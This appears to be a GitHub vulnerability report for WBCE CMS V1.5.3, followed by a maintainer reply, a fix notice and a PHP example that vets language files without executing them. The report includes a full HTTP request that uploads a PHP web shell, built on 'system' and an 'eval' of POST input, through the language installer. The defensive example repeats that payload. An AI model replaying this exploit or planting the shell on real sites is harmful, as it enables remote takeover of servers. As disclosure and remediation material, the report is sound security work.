Command execution vulnerability exists in WBCE CMS V1.5.3 background #544

Closed
secflag opened this issue Mar 14, 2023 · 2 comments

secflag commented Mar 14, 2023

Vulnerability description

There is a command execution vulnerability in the background of WBCE CMS V1.5.3.
Vulnerability URL: /admin/languages/install.php. Parameter filtering in the Install Language module is not strict, so there is a command execution vulnerability.

Vulnerability analysis

In the receiving method on line 47 of the file /admin/languages/install.php, the system first saves the data submitted by the client to a temporary file, and then executes the relevant code to trigger the command execution vulnerability.

Vulnerability verification process

POST /admin/languages/install.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://localhost/admin/languages/index.php
Cookie: phpsessid-5239-sid=hhh85m1as94tpdkq36vnjcommm; WBCELastConnectJS=1664417056; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------7377265762079
Content-Length: 496

-----------------------------7377265762079
Content-Disposition: form-data; name="formtoken"

67491209-95651bfdf4022592df7062726ca433cbba088a8b
-----------------------------7377265762079
Content-Disposition: form-data; name

Content-Type: application/octet-stream

<?php echo(system('whoami'));@eval($_POST[stcs]);?>
-----------------------------7377265762079
Content-Disposition: form-data; name="submit"


-----------------------------7377265762079--


@instantflorian
Contributor

Thanks for reporting.
The vulnerability is only accessible if a malicious user a) has backend access and b) is allowed to install languages. Fixing the issue would mean applying conceptual changes to the whole language management; so actually it is the responsibility of the site administrator to grant access only to trustworthy users and only to the areas they really need (e.g. editing contents but not installing modules, languages etc.).
Nevertheless we will take this into consideration for a later version.

instantflorian added this to the vlater milestone Mar 17, 2023
@instantflorian
Contributor

fixed with e434944
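
As an added illustration (not code from WBCE and not the change in e434944), one way to read an uploaded language file without executing it is to tokenize it and accept only literal assignments. The function name `vet_language_file` and the restricted file format it enforces are assumptions made for this example.

```php
<?php
// Added example, not WBCE code. Assumed format: $NAME = 'text'; or $NAME['KEY'] = 'text';
// The upload is only tokenized; it is never passed to include, require or eval.
function vet_language_file(string $source): array
{
    $tokens = [];
    foreach (token_get_all($source) as $tok) {
        $id = is_array($tok) ? $tok[0] : $tok;
        if (in_array($id, [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)) {
            continue; // layout and comments carry no behaviour
        }
        $tokens[] = [$id, is_array($tok) ? $tok[1] : $tok];
    }
    $expect = function (int $i, $id) use ($tokens): string {
        if (!isset($tokens[$i]) || $tokens[$i][0] !== $id) {
            throw new RuntimeException("disallowed construct at token $i");
        }
        return $tokens[$i][1];
    };
    $literal = function (int $i) use ($expect): string {
        $text = $expect($i, T_CONSTANT_ENCAPSED_STRING);
        if ($text[0] !== "'") { // double-quoted strings have richer escapes; refuse them
            throw new RuntimeException("only single-quoted literals are accepted");
        }
        return strtr(substr($text, 1, -1), ['\\\\' => '\\', "\\'" => "'"]);
    };
    $expect(0, T_OPEN_TAG); // also rejects leading inline HTML and short echo tags
    $out = [];
    for ($i = 1, $n = count($tokens); $i < $n; $i++) {
        $name = substr($expect($i, T_VARIABLE), 1);
        if ($name === 'GLOBALS' || $name === 'this' || $name[0] === '_') {
            throw new RuntimeException("reserved variable \$$name");
        }
        if (isset($tokens[$i + 1]) && $tokens[$i + 1][0] === '[') {
            $name .= '[' . $literal($i + 2) . ']';
            $expect($i + 3, ']');
            $i += 3;
        }
        $expect(++$i, '=');
        $value = $literal(++$i);
        $expect(++$i, ';');
        $out[$name] = $value; // flat map, e.g. "TEXT[HELLO]" => "..."
    }
    return $out;
}
// Constructed samples: a benign file in the assumed format, and the payload from the report.
$benign  = "<?php\n\$language_code = 'EN';\n\$TEXT['HELLO'] = 'It\\'s here';\n";
$payload = "<?php echo(system('whoami'));@eval(\$_POST[stcs]);?>";
print_r(vet_language_file($benign));
try { vet_language_file($payload); } catch (RuntimeException $e) { echo $e->getMessage(), "\n"; }
```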
